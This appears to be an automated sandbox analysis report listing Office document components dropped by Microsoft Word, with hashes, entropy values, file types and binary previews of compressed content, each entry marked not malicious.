                                                                                                                                                                                                                                                                                                                                                                          SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1091485
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.906659368807194
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                                                                                                                                                                                                                                          MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):608122
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.729143855239127
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                                                                                                                                                                                                                                          MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                                                                                                                                                                                                                                          SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5783
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.88616857639663
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                                                                                                                                                                                                                                          MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4026
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.809492693601857
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                                                                                                                                                                                                                                          MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4243
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.824383764848892
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                                                                                                                                                                                                                                          MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):16806
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9519793977093505
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                                                                                                                                                                                                                                          MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                                                                                                                                                                                                                                          SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):11380
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.891971054886943
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):6024
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.886254023824049
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                                                                                                                                                                                                                                          MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9191
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.93263830735235
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                                                                                                                                                                                                                                          MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4326
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.821066198539098
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                                                                                                                                                                                                                                          MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):7370
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9204386289679745
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                                                                                                                                                                                                                                          MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
